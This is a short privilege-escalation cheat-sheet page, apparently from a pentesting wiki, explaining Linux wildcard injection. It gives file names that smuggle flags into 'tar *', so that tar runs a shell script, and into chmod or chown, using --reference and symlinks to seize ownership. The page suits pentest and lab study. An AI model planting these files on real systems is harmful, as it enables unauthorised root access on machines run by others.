Wildcard Injection

Exploiting Wildcard for Privilege Escalation - Hacking ArticlesHacking Articles

If you have a file named --help in the current directory and you run the command cat *, then instead of the contents of the --help file, the cat command’s help page will be printed. This is because the asterisk was replaced by --help and bash doesn’t know it’s supposed to be a file, and not a flag.

For programs which are run by a privileged user with an asterisk, and which have flags which can have dangerous results, this can lead to privesc (for example chown and tar). This vulnerability is often in found in automatic cronjobs run by the admin.

Note: The above-described vulnerability wouldn't work if the command was cat somedirectory/*, because it would expand to cat somedirectory/--help. Naming the file --help (with a space in front of the dashes) won't help, either.

Tar RCE

Write the following files to the directory where tar * is run:

echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Chmod/chown Privilege Hijack

Add a file with the following filename to the directory where chmod or chown is run with an asterisk:

--reference=FILE_YOU_OWN

When the chmod or chown command is run, then all the files will be changed to have the same permissions/ownder as FILE_YOU_OWN. You will have to create a file named FILE_YOU_OWN, obviously.

PS! You can use symlinks to change ownership of external files as well.

PreviousSymlink Trickery NextDocker group/LXD group

Last updated 1 year ago